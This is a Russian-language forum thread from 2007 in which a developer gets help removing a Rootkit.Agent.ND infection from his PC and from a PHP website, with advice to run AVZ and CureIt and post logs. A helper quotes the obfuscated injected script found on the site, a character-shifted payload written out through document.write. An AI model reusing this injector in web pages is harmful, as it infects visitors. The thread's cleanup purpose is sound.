-
Junior Member
- Вес репутации
- 61
Rootki.Agent.ND на компе и на сайте!
NOD32 обнаружил вирус Rootki.Agent.ND.
но видимо не может удалить никак.
читал, что вирус этот попадает с сайтов.
так вот, у меня на разработке несколько сайтов. и заходя на них в браузере у меня нод блокирует этот вирус.
на парочке сайтов перезалил через ФТП все содержимое, после чего на перезалитые сайты НОД ругаться перестал.
но есть один сайт который не рискнул перезаливать. и вот заходя на него НОД ругается.
помимо того захожу с других компов на этот сайт и везде НОД ругается.
в итоге не пойму как избавиться от вируса на сайте, если он там есть, и как вылечить комп.
AVZ У меня есть. что дальше?
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
вирус на сайте удаляется редактированием кода html , если вы говорите у вас есть доступ к админке сайтa- вам и карты в руки. Чтобы почистить компьютер, выполнить правила- уже жирным шрифтом выделено http://virusinfo.info/showthread.php?t=1235 , выполнить полностью.
-
-
Пункт 2 выполнять так:
Отключится от сети.
Отключить антивирус.
Запустить проверку CureIt (см. картинку).
Отчет проверки сохранить в файл.
Закрыть CureIt, если он предложит перезагрузить компьютер, согласитесь.
Загрузить отчет сюда в архиве zip.
Если не получится провести проверку в нормальном режиме загрузки Windows, попробуйте проверить в безопасном режиме (нажмите F8 при запуске компьютера).
-
-
Junior Member
- Вес репутации
- 61
где сидит вирус на сайте?
какой у него код в html? сайт у меня на PHP
-
Где логи с компа ? Линк на сайт запостить не активно , можно использовать
-
-
Junior Member
- Вес репутации
- 61
Последний раз редактировалось denis-personal; 30.10.2007 в 15:40.
-
вот это по моему зловредное:
Код:
<script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&45&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&4:&49&3d&42&41&49&3d&45&49&3d&4:&4:&3d&42&41&48&3d&42&41&42&3d&42&42&45&3d&45&47&3d&42&41&46&3d&42&42&41&3d&42&41&43&3d&42&42&42&3d&45&48&3d&42&41&46&3d&42&42&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&45&3d&44&43&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&45&3d&42&41&41&3d&42&41&46&3d&42&42&46&3d&42&42&43&3d&42&41&49&3d&4:&48&3d&42&43&42&3d&46&49&3d&42&42&41&3d&42&42&42&3d&42&42&41&3d&42&41&42&3d&44&45&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&42&44&3d&42&41&3d&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&45&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&42&42&47&3d&4:&48&3d&42&41&48&3d&42&41&42&3d&42&42&41&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&42&42&46&3d&45&47&3d&4:&4:&3d&42&42&41&3d&45&48&3d&42&41&46&3d&42&42&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&45&3d&44&43&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&45&3d&42&41&41&3d&42&41&46&3d&42&42&46&3d&42&42&43&3d&42&41&49&3d&4:&48&3d&42&43&42&3d&46&49&3d&42&42&41&3d&42&42&42&3d&42&42&41&3d&42&41&42&3d&44&45&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&42&44&3d&42&41&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
удалить 
Логов мы дождёмся от вас или нет?
-
-
Junior Member
- Вес репутации
- 61
сайт вылечил. сенкс.
жду итогов сканирования
Добавлено через 26 минут
вирусов не найдено. видимо я его почистил чем до этого...
спасибо огромное, человеки!
можно вздохнуть спокойно и проверить еще 20 компов.
занавес
Последний раз редактировалось denis-personal; 30.10.2007 в 16:01.
Причина: Добавлено
-
логи нужны в теме , это мы уж решим есть вирусы или нет
-
